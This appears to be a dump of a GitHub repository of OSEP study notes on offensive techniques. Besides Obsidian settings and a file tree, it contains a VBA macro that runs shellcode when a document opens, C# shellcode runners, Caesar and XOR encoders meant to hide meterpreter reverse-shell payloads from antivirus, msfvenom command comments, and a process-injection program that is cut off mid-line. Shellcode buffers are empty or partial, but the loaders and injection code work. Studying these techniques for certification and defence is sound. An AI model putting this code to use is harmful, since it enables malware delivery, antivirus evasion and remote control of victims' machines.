├── .obsidian ├── hotkeys.json ├── appearance.json ├── app.json ├── plugins │ ├── table-editor-obsidian │ │ ├── data.json │ │ ├── manifest.json │ │ └── styles.css │ ├── obsidian-mind-map │ │ └── manifest.json │ ├── calendar │ │ ├── data.json │ │ └── manifest.json │ ├── obsidian-git │ │ ├── manifest.json │ │ ├── data.json │ │ └── styles.css │ ├── better-word-count │ │ ├── manifest.json │ │ ├── styles.css │ │ └── data.json │ └── obsidian-image-toolkit │ │ ├── manifest.json │ │ └── styles.css ├── community-plugins.json ├── themes │ └── Things │ │ └── manifest.json ├── core-plugins.json ├── graph.json ├── vault-stats.json ├── core-plugins-migration.json ├── workspace └── workspace.json ├── Tools ├── DotNetToJScript │ ├── NDesk.Options.dll │ └── DotNetToJScript.exe ├── SharpShooter │ ├── requirements.txt │ └── SharpShooter.py └── AV Evasion │ └── Find-AVSignature.ps1 ├── Advanced Antivirus Evasion ├── images │ ├── AMSI │ │ ├── onEnter.png │ │ ├── onLeave.png │ │ ├── flowchart.png │ │ ├── handlers.png │ │ ├── frida-trace.png │ │ ├── mal-string.png │ │ ├── new-process.png │ │ ├── split-bypass.png │ │ ├── test-string.png │ │ ├── random-string.png │ │ ├── current-process.png │ │ └── amsi-scan-buffer-handler.png │ └── Windbg │ │ ├── 32-bit.png │ │ ├── 64-bit.png │ │ ├── modify-stack.png │ │ ├── breakpoint-hit.png │ │ ├── detailed-view.png │ │ ├── search-process.png │ │ ├── view-registers.png │ │ ├── windbg-search.png │ │ ├── create-breakpoint.png │ │ ├── view-7-instructions.png │ │ └── move-through-instructions.png └── README.md ├── Client-Side-Code-Execution-With-Office └── images │ ├── vba-editor.png │ ├── trust-center-default.png │ └── trust-center-protected.png ├── Client-Side-Execution-With-Windows-Script-Host ├── images │ ├── msfvenom.png │ ├── DotNetToJscript.png │ └── JscriptShellcode.png ├── Compiled binaries │ ├── HelloWorld.exe │ ├── MessageBox.exe │ ├── ExampleAssembly.dll │ ├── JscriptShellcode.dll │ ├── ReflectiveLoad.dll │ └── ShellcodeRunner.exe ├── C# Programs │ ├── HelloWorld.cs │ ├── ExampleAssembly.cs │ ├── MessageBox.cs │ ├── JscriptShellcode.cs │ ├── ShellcodeRunner.cs │ └── ReflectiveLoad.cs ├── README.md └── JScript │ ├── ExampleAssembly.js │ └── JscriptShellcode.js ├── LICENSE ├── Antivirus Evasion ├── VBA Scripts │ └── ShellcodeRunner.vba ├── C# Programs │ ├── vba_encrypt.cs │ ├── ShellcodeRunner.cs │ ├── XorEncoder.cs │ └── CaesarEncoder.cs └── README.md ├── Process Injection and Migration ├── C# Programs │ ├── process-injection.cs │ └── dll-injection.cs └── README.md ├── README.md └── Operating-System-and-Programming-Fundamentals └── README.md /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | {} -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "accentColor": "#a667da", 3 | "cssTheme": "Things" 4 | } -------------------------------------------------------------------------------- /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "attachmentFolderPath": "Advanced Antivirus Evasion/images/AMSI" 3 | } -------------------------------------------------------------------------------- /Tools/DotNetToJScript/NDesk.Options.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Tools/DotNetToJScript/NDesk.Options.dll -------------------------------------------------------------------------------- /Tools/SharpShooter/requirements.txt: -------------------------------------------------------------------------------- 1 | jsmin==2.2.2 --hash=sha256:b6df99b2cd1c75d9d342e4335b535789b8da9107ec748212706ef7bbe5c2553b -------------------------------------------------------------------------------- /Tools/DotNetToJScript/DotNetToJScript.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Tools/DotNetToJScript/DotNetToJScript.exe -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/onEnter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/onEnter.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/onLeave.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/onLeave.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/flowchart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/flowchart.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/handlers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/handlers.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/32-bit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/32-bit.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/64-bit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/64-bit.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/frida-trace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/frida-trace.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/mal-string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/mal-string.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/new-process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/new-process.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/split-bypass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/split-bypass.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/test-string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/test-string.png -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "formatType": "normal", 3 | "showRibbonIcon": true, 4 | "bindEnter": true, 5 | "bindTab": true 6 | } -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/random-string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/random-string.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/modify-stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/modify-stack.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/current-process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/current-process.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/breakpoint-hit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/breakpoint-hit.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/detailed-view.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/detailed-view.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/search-process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/search-process.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/view-registers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/view-registers.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/windbg-search.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/windbg-search.png -------------------------------------------------------------------------------- /Client-Side-Code-Execution-With-Office/images/vba-editor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Code-Execution-With-Office/images/vba-editor.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/create-breakpoint.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/create-breakpoint.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/view-7-instructions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/view-7-instructions.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/amsi-scan-buffer-handler.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/amsi-scan-buffer-handler.png -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/images/msfvenom.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/images/msfvenom.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/move-through-instructions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/move-through-instructions.png -------------------------------------------------------------------------------- /Client-Side-Code-Execution-With-Office/images/trust-center-default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Code-Execution-With-Office/images/trust-center-default.png -------------------------------------------------------------------------------- /Client-Side-Code-Execution-With-Office/images/trust-center-protected.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Code-Execution-With-Office/images/trust-center-protected.png -------------------------------------------------------------------------------- /.obsidian/community-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "table-editor-obsidian", 3 | "calendar", 4 | "better-word-count", 5 | "obsidian-image-toolkit", 6 | "obsidian-mind-map", 7 | "obsidian-git" 8 | ] -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/images/DotNetToJscript.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/images/DotNetToJscript.png -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/images/JscriptShellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/images/JscriptShellcode.png -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/HelloWorld.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/HelloWorld.exe -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/MessageBox.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/MessageBox.exe -------------------------------------------------------------------------------- /.obsidian/themes/Things/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Things", 3 | "version": "2.1.9", 4 | "minAppVersion": "1.0.0", 5 | "author": "@colineckert", 6 | "authorUrl": "https://twitter.com/colineckert" 7 | } 8 | -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ExampleAssembly.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ExampleAssembly.dll -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/JscriptShellcode.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/JscriptShellcode.dll -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ReflectiveLoad.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ReflectiveLoad.dll -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ShellcodeRunner.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ShellcodeRunner.exe -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-mind-map/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-mind-map", 3 | "name": "Mind Map", 4 | "version": "1.1.0", 5 | "description": "A plugin to preview notes as Markmap mind maps", 6 | "isDesktopOnly": false, 7 | "js": "main.js" 8 | } -------------------------------------------------------------------------------- /.obsidian/plugins/calendar/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "shouldConfirmBeforeCreate": true, 3 | "weekStart": "locale", 4 | "wordsPerDot": 250, 5 | "showWeeklyNote": false, 6 | "weeklyNoteFormat": "", 7 | "weeklyNoteTemplate": "", 8 | "weeklyNoteFolder": "", 9 | "localeOverride": "system-default" 10 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-git", 3 | "name": "Obsidian Git", 4 | "description": "Backup your vault with Git.", 5 | "isDesktopOnly": false, 6 | "fundingUrl": "https://ko-fi.com/vinzent", 7 | "js": "main.js", 8 | "version": "2.20.0" 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/better-word-count/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "better-word-count", 3 | "name": "Better Word Count", 4 | "version": "0.9.6", 5 | "description": "Counts the words of selected text in the editor.", 6 | "author": "Luke Leppan", 7 | "authorUrl": "https://lukeleppan.com", 8 | "isDesktopOnly": false 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/calendar/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "calendar", 3 | "name": "Calendar", 4 | "description": "Calendar view of your daily notes", 5 | "version": "1.5.10", 6 | "author": "Liam Cain", 7 | "authorUrl": "https://github.com/liamcain/", 8 | "isDesktopOnly": false, 9 | "minAppVersion": "0.9.11" 10 | } 11 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-image-toolkit/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-image-toolkit", 3 | "name": "Image Toolkit", 4 | "version": "1.3.1", 5 | "minAppVersion": "0.2.0", 6 | "description": "This plugin provides some image viewing toolkit.", 7 | "author": "sissilab", 8 | "authorUrl": "https://github.com/sissilab", 9 | "isDesktopOnly": true 10 | } 11 | -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "canvas", 8 | "outgoing-link", 9 | "tag-pane", 10 | "page-preview", 11 | "daily-notes", 12 | "templates", 13 | "note-composer", 14 | "command-palette", 15 | "editor-status", 16 | "bookmarks", 17 | "outline", 18 | "word-count", 19 | "file-recovery" 20 | ] -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/HelloWorld.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace HelloWorld 8 | { 9 | class Program 10 | { 11 | static void Main(string[] args) 12 | { 13 | Console.WriteLine("Hello World!"); 14 | } 15 | } 16 | } -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "table-editor-obsidian", 3 | "name": "Advanced Tables", 4 | "author": "Tony Grosinger", 5 | "authorUrl": "https://grosinger.net", 6 | "description": "Improved table navigation, formatting, manipulation, and formulas", 7 | "isDesktopOnly": false, 8 | "minAppVersion": "1.0.0", 9 | "version": "0.18.1", 10 | "js": "main.js", 11 | "donation": "https://buymeacoffee.com/tgrosinger" 12 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/ExampleAssembly.cs: -------------------------------------------------------------------------------- 1 | using System.Diagnostics; 2 | using System.Runtime.InteropServices; 3 | using System.Windows.Forms; 4 | [ComVisible(true)] 5 | public class TestClass 6 | { 7 | public TestClass() 8 | { 9 | MessageBox.Show("Test", "Test", MessageBoxButtons.OK, MessageBoxIcon.Exclamation); 10 | } 11 | public void RunProcess(string path) 12 | { 13 | Process.Start(path); 14 | } 15 | } -------------------------------------------------------------------------------- /.obsidian/plugins/better-word-count/styles.css: -------------------------------------------------------------------------------- 1 | details.bwc-sb-item-setting { 2 | border: 1px solid var(--background-modifier-border); 3 | border-radius: 10px; 4 | padding: 10px 5px 20px 10px; 5 | margin-top: 5px; 6 | margin-bottom: 10px; 7 | } 8 | .bwc-sb-item-setting summary::marker { 9 | font-size: 10px; 10 | } 11 | 12 | /* .bwc-sb-item-setting summary { */ 13 | /* margin-bottom: 5px; */ 14 | /* } */ 15 | .bwc-sb-item-setting summary span.bwc-sb-buttons { 16 | float: right; 17 | } 18 | 19 | .bwc-status-bar-settings-title { 20 | margin-bottom: 0px; 21 | } 22 | -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": true, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": true, 16 | "centerStrength": 0.518713248970312, 17 | "repelStrength": 10, 18 | "linkStrength": 1, 19 | "linkDistance": 250, 20 | "scale": 1, 21 | "close": false 22 | } -------------------------------------------------------------------------------- /.obsidian/plugins/better-word-count/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "statusBar": [ 3 | { 4 | "prefix": "", 5 | "suffix": " words", 6 | "metric": { 7 | "type": 0, 8 | "counter": 0 9 | } 10 | }, 11 | { 12 | "prefix": " ", 13 | "suffix": " characters", 14 | "metric": { 15 | "type": 0, 16 | "counter": 1 17 | } 18 | } 19 | ], 20 | "altBar": [ 21 | { 22 | "prefix": "", 23 | "suffix": " files", 24 | "metric": { 25 | "type": 2, 26 | "counter": 6 27 | } 28 | } 29 | ], 30 | "countComments": false, 31 | "collectStats": true, 32 | "pageWords": 300 33 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/MessageBox.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Diagnostics; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace MessageBox 10 | { 11 | class Program 12 | { 13 | [DllImport("user32.dll", CharSet = CharSet.Auto)] 14 | public static extern int MessageBox(IntPtr hWnd, String text, String caption, int options); 15 | static void Main(string[] args) 16 | { 17 | MessageBox(IntPtr.Zero, "This is my text", "This is my caption", 0); 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /.obsidian/vault-stats.json: -------------------------------------------------------------------------------- 1 | {"history":{"2023-05-31":{"words":0,"characters":0,"sentences":0,"pages":0,"files":0,"footnotes":0,"citations":0,"totalWords":13191,"totalCharacters":94006,"totalSentences":568,"totalFootnotes":0,"totalCitations":0,"totalPages":44},"2023-06-01":{"words":70,"characters":444,"sentences":1,"pages":0.20000000000000018,"files":7,"footnotes":0,"citations":0,"totalWords":13261,"totalCharacters":94449,"totalSentences":569,"totalFootnotes":3264,"totalCitations":3264,"totalPages":44.2}},"modifiedFiles":{"Advanced Antivirus Evasion/README.md":{"words":{"initial":1291,"current":1361},"characters":{"initial":8856,"current":9300},"sentences":{"initial":67,"current":68},"footnotes":{"initial":0,"current":0},"citations":{"initial":0,"current":0},"pages":{"initial":4.3,"current":4.5}}}} -------------------------------------------------------------------------------- /.obsidian/core-plugins-migration.json: -------------------------------------------------------------------------------- 1 | { 2 | "file-explorer": true, 3 | "global-search": true, 4 | "switcher": true, 5 | "graph": true, 6 | "backlink": true, 7 | "outgoing-link": true, 8 | "tag-pane": true, 9 | "page-preview": true, 10 | "daily-notes": true, 11 | "templates": true, 12 | "note-composer": true, 13 | "command-palette": true, 14 | "slash-command": false, 15 | "editor-status": true, 16 | "starred": true, 17 | "markdown-importer": false, 18 | "zk-prefixer": false, 19 | "random-note": false, 20 | "outline": true, 21 | "word-count": true, 22 | "slides": false, 23 | "audio-recorder": false, 24 | "workspaces": false, 25 | "file-recovery": true, 26 | "publish": false, 27 | "sync": false, 28 | "canvas": true, 29 | "bookmarks": true 30 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Cipher7 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Antivirus Evasion/VBA Scripts/ShellcodeRunner.vba: -------------------------------------------------------------------------------- 1 | Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr 2 | Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr 3 | Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr 4 | 5 | Function mymacro() 6 | Dim buf As Variant 7 | Dim addr As LongPtr 8 | Dim counter As Long 9 | Dim data As Long 10 | Dim res As Long 11 | 12 | buf = Array(123,23,332,323,232) 'Shellcode' 13 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) 14 | For counter = LBound(buf) To UBound(buf) 15 | data = buf(counter) 16 | res = RtlMoveMemory(addr + counter, data, 1) 17 | Next counter 18 | 19 | res = CreateThread(0, 0, addr, 0, 0, 0) 20 | 21 | Sub Document_Open() 22 | mymacro 23 | End Sub 24 | 25 | Sub AutoOpen() 26 | mymacro 27 | End Sub -------------------------------------------------------------------------------- /Antivirus Evasion/C# Programs/vba_encrypt.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace Program 8 | { 9 | public class vba_encrypt // Caesar Cipher Encryption 10 | { 11 | public static void Main(string[] args) 12 | { 13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= EXITFUNC=thread -f csharp 14 | byte[] buf = new byte[0] { }; 15 | byte[] encoded = new byte[buf.Length]; 16 | for(int i = 0; i < buf.Length; i++) 17 | { 18 | encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF); // shift of 2 19 | } 20 | uint counter = 0; 21 | 22 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 23 | foreach(byte b in encoded) 24 | { 25 | hex.AppendFormat("{0:D}, ", b); 26 | counter++; 27 | if(counter % 50 == 0) 28 | { 29 | hex.AppendFormat("_{0}", Environment.NewLine); 30 | } 31 | } 32 | Console.WriteLine("The payload is: " + hex.ToString()); 33 | } 34 | } 35 | } -------------------------------------------------------------------------------- /Antivirus Evasion/C# Programs/ShellcodeRunner.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using System.Net; 5 | using System.Text; 6 | using System.Threading; 7 | 8 | namespace ConsoleApp1 9 | { 10 | class ShellcodeRunner 11 | { 12 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 13 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 14 | 15 | [DllImport("kernel32.dll")] 16 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 17 | 18 | [DllImport("kernel32.dll")] 19 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 20 | 21 | static void Main(string[] args) 22 | { 23 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= EXITFUNC=thread -f csharp 24 | byte[] buf = new byte[0] { }; 25 | int size = buf.Length; 26 | IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); 27 | Marshal.Copy(buf, 0, addr, size); 28 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 29 | WaitForSingleObject(hThread, 0xFFFFFFFF); 30 | } 31 | } 32 | } -------------------------------------------------------------------------------- /Antivirus Evasion/C# Programs/XorEncoder.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace Program 8 | { 9 | public class XorEncoder 10 | { 11 | public static void Main(string[] args) 12 | { 13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= EXITFUNC=thread -f csharp 14 | byte[] buf = new byte[0] { }; 15 | 16 | byte[] encoded = new byte[buf.Length]; 17 | for (int i = 0; i < buf.Length; i++) 18 | { 19 | encoded[i] = (byte)(((uint)buf[i] + 5 ) ^ 0xff); // Caesar Shift of 5 with key as 0xff 20 | } 21 | 22 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 23 | int totalCount = encoded.Length; 24 | for (int count = 0; count < totalCount; count++) 25 | { 26 | byte b = encoded[count]; 27 | 28 | if ((count + 1) == totalCount) // Dont append comma for last item 29 | { 30 | hex.AppendFormat("0x{0:x2}", b); 31 | } 32 | else 33 | { 34 | hex.AppendFormat("0x{0:x2}, ", b); 35 | } 36 | 37 | if ((count + 1) % 15 == 0) 38 | { 39 | hex.Append("\n"); 40 | } 41 | } 42 | 43 | Console.WriteLine($"XOR Payload (KEY : 0xff):"); 44 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};"); 45 | } 46 | } 47 | } -------------------------------------------------------------------------------- /Process Injection and Migration/C# Programs/process-injection.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace Inject 5 | { 6 | class Program 7 | { 8 | 9 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 10 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 11 | 12 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 13 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 14 | 15 | [DllImport("kernel32.dll")] 16 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 17 | 18 | [DllImport("kernel32.dll")] 19 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 20 | 21 | static void Main(string[] args) 22 | { 23 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, 4804); 24 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 25 | byte[] buf = new byte[591] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x0a,0x41,0x89,0xda,0xff,0xd5 }; 26 | IntPtr outSize; 27 | WriteProcessMemory(hProcess, addr, buf, 